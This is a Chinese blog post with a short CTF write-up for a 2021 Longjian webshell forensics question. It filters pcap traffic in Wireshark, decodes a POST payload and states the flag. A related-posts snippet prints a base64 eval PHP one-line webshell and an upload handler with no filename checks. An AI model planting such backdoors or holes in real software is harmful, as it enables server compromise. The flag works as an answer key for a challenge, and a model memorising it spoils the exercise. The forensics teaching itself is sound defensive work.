NSSCTF-[陇剑杯 2021]webshell(问6)

已于 2025-05-22 11:02:40 修改
阅读量254 收藏
点赞数 1
分类专栏: NSS 文章标签: NSS 流量分析 网络安全
于 2025-05-22 11:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2501_91013872/article/details/148134953
版权

下载得到pcap文件

放到Wireshark进行分析

先过滤http contains "1.php"&&http.request.method=="POST"

追踪HTTP流

将=后面的进行解码

得到flag

NSSCTF{192.168.239.123}

misc刷题记录2[陇剑 2021]
2301_81841047的博客
06-17 1760
由上可知,在登录成功是在101以后 ,所以直接往后面找就可以,定位到了关键信息,但是通过分析可知,这里获得的是相对路径,通过前面对流量包的分析可知,这里使用的系统是linux,那么也就是说,可以猜测前面的内容应该是/var/www/html,但是保险起见,还是筛选一下pwd命令,看看完整路径,这里检测pwd是因为按照做题经验,一般修改以后都会用pwd命令看看是否修改成功。命令会打印出当前正在工作的目录的绝对路径。这里要求的是权限,思路是先检索关键字“whoami”,因为这个命令可以查看现在用户的权限状态,
[2021首届“陇剑网络安全大赛] webshell
ShenZ的博客
09-15 3342
题目描述 单位网站被黑客挂马,请您从流量中分析出webshell,进行回答: 1.黑客登录系统使用的密码是_____________。 2.黑客修改了一个日志文件,文件的绝对路径为_____________。(请确认绝对路径后再提交) 3.黑客获取webshell之后,权限是______? 4.黑客写入的webshell文件名是_____________。(请提交带有文件后缀的文件名,例如x.txt) 5.黑客上传的代理工具客户端名字是_____________。(如有字母请全部使用小写) 6.黑客代理工.
ctf】whireshark流量分析之tcp_杂篇
一大口木的博客
12-21 4176
流量分析之tcp_杂篇
Nssctf[陇剑 2021]jwt,webshell,日志分析
m0_73756016的博客
08-12 1137
得到的flag请使用NSSCTF{}格式提交。得到的flag请使用NSSCTF{}格式提交。得到的flag请使用NSSCTF{}格式提交。得到的flag请使用NSSCTF{}格式提交。得到的flag请使用NSSCTF{}格式提交。得到的flag请使用NSSCTF{}格式提交。得到的flag请使用NSSCTF{}格式提交。得到的flag请使用NSSCTF{}格式提交。得到的flag请使用NSSCTF{}格式提交。得到的flag请使用NSSCTF{}格式提交。得到的flag请使用NSSCTF{}格式提交。
NSSCTF[陇剑 2021]webshell
J_linnb的博客
04-24 3678
或者导出HTTP对象,一个个找,在index.php%3fm=home&a=assign_resume_tpl文件中发现了含有phpinfo()页面的东西,将其后缀变更为.html用浏览器打开,然后找到答案。追踪tcp流,在流38中发现一串十六进制代码,这是蚁剑特征的数据流 ,将=号后面的内容进行base16解码,找到答案。根据上题,1.php就是黑客上传的webshell,继续往下分析1.php可以看到frpc就是代理工具客户端。搜索whoami,在317号包发现whoami,在319号响应包有结果。
NSSCTF-[陇剑 2021]webshell7)
2501_91013872的博客
05-22 286
在分析pcap文件时,首先使用Wireshark过滤出与1.php相关的流量,因为该文件用于登录操作。通过追踪HTTP流,可以获取到编码后的账号和密码信息。为了解码这些信息,需要使用CyberChef工具,该工具可在GitHub上下载。CyberChef支持多种编码方式,包括Base编码,能够帮助用户快速解码并获取原始数据。这一过程对于网络安全分析和数据恢复具有重要意义。
NSSCTF(MISC)—[陇剑 2021]webshell1~7)
hzhfhsq的博客
10-11 1665
流量包中发现该网站系统为Linux系统,由此猜测默认目录为/var/www/html也可以继续查看后续流量包,其中存在命令执行pwd,查看http流,可以准确的得到网站目录为/var/www/html。http contains "whoami"查看http协议中包含whoami(查看当前用户的命令)的流量包。http contains ".log"查看HTTP中有.log(日志文件后缀)的流量包.http contains "login"查看HTTP中有login(登录)的流量包。
[陇剑 2021]之Misc篇(NSSCTF)刷题记录④
Aluxian_的博客
04-25 1866
[陇剑 2021]Misc篇(NSSCTF)刷题记录④
NSSCTF(MISC)—[陇剑 2021]签到
hzhfhsq的博客
09-27 279
打开流量包,发现http占比大,过滤http,发现大量403。flag为NSSCTF{http}
[陇剑 2021]之Misc篇(NSSCTF)刷题记录⑤
Aluxian_的博客
04-26 2703
[陇剑 2021]之Misc篇(NSSCTF)刷题记录⑤
[陇剑 2021]jwt
网安日记本的博客
01-19 3154
[陇剑 2021]jwt 题目做法及思路解析(个人分享)
misc刷题记录(1)陇剑
2301_81841047的博客
06-14 1366
题目内容:此时正在进行的可能是__________协议的网络攻击。(如有字母请全部使用小写,填写样例:http、dns、ftp)。得到的flag请使用NSSCTF{}格式提交。打开统计,找到协议分级,发现TCP协议是占比最多的协议在TCP协议里HTTP协议占了大部分。筛选http流量,发现很多403的失败请求,故答案为http。
[陇剑 2024]之Misc篇(NSSCTF)刷题记录④_请您从流量中分析出webshell,进行回答 黑客写入的webshell文件名是(3)
2401_84264096的博客
05-08 663
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8704
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
卫星通信技术在智能交通中的应用.doc
05-24
卫星通信技术在智能交通中的应用.doc
商场无线网络专项方案.doc
05-24
商场无线网络专项方案.doc
《国际项目管理专业资质认证(IPMP)》培训之三.pdf
最新发布
05-24
《国际项目管理专业资质认证(IPMP)》培训之三.pdf
商店销售网站的设计与实现.docx
05-24
商店销售网站的设计与实现.docx
PMSM永磁同步电机的三电平SVPWM与双环矢量控制仿真及MATLAB实现 全集
05-24
内容概要:本文详细介绍了PMSM(永磁同步电机)的仿真研究及其两种关键控制方法:三电平SVPWM矢量控制和双环矢量控制。首先阐述了PMSM在现代电机驱动系统中的重要地位及其广泛的应用领域,如电动汽车、机器人和风力发电等。接着讨论了PMSM仿真的重要性,包括电气特性、机械特性和热特性等方面的考量。然后深入探讨了三电平SVPWM矢量控制技术的工作原理及其对电机性能的提升效果,如提高运行效率和减少谐波失真。随后介绍了PMSM双环矢量控制的具体实现方式,即内环电流控制和外环速度控制相结合的方法,强调了这种方法在提高电机动态性能和稳定性方面的优势。最后对比了传统三电平控制方法和双环矢量控制方法的特点,指出了各自的优势和应用场景。 适合人群:从事电机控制系统研究的技术人员、高校相关专业师生、对电机控制感兴趣的工程技术人员。 使用场景及目标:适用于需要深入了解PMSM控制技术和仿真实现的研究项目和技术开发。目标是帮助读者掌握PMSM的仿真建模方法,理解并应用三电平SVPWM和双环矢量控制技术,以优化电机性能。 其他说明:本文不仅提供了理论分析,还通过MATLAB进行了详细的仿真演示,使读者能够直观地看到不同控制方法的效果。这对于实际工程项目的设计和优化具有重要的指导意义。
[陇剑 2021]webshell5)
03-17
关于陇剑2021中的WebShell第五题的具体解答或提示,目前并未有直接提及该题目详细解法的内容。然而,在类似的竞赛环境中,WebShell类题目通常涉及以下几个方面的考察: ### 常见考点分析 #### 1. 文件上传漏洞 文件上传功能可能未对上传的文件类型进行严格校验,允许攻击者上传恶意脚本文件并执行命令[^1]。 ```php <?php if (isset($_FILES['file'])) { $filename = $_FILES['file']['name']; move_uploaded_file($_FILES['file']['tmp_name'], "./uploads/" . $filename); } ?> ``` 上述代码片段展示了一个简单的文件上传逻辑,其中缺少对`$filename`的安全验证机制,可能导致任意文件被上传至服务器。 #### 2. 输入过滤绕过 某些情况下,输入参数可能会经过简单字符串替换或其他形式的基础防护处理,但这些措施往往存在可利用的空间。例如通过编码转换、大小写变换等方式实现有效载荷的成功注入。 #### 3. 后门隐藏技巧 为了躲避检测工具以及管理员审查,参赛选手需要掌握如何巧妙地将恶意代码嵌入到看似无害的应用程序组件当中去。这包括但不限于使用base64加密后的PHP一句话木马等形式。 ```php <?php @eval(base64_decode($_POST['cmd'])); ?> ``` 此段代码即为典型的一句话木马实例,它接收来自HTTP POST请求中的名为'cmd'的数据项,并将其作为Base64编码串解析后再交由PHP引擎解释运行。 ### 推荐策略建议 针对此类挑战赛题解决方法可以从以下角度出发思考: - **逆向工程**:如果提供了二进制或者混淆过的源码,则需运用反汇编器等软件对其进行深入剖析; - **模糊测试(Fuzzing)** :自动化尝试各种边界条件下的非法操作来发现潜在缺陷; - **日志审计**:仔细查阅服务端留存下来的访记录有助于定位异常行为模式;
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值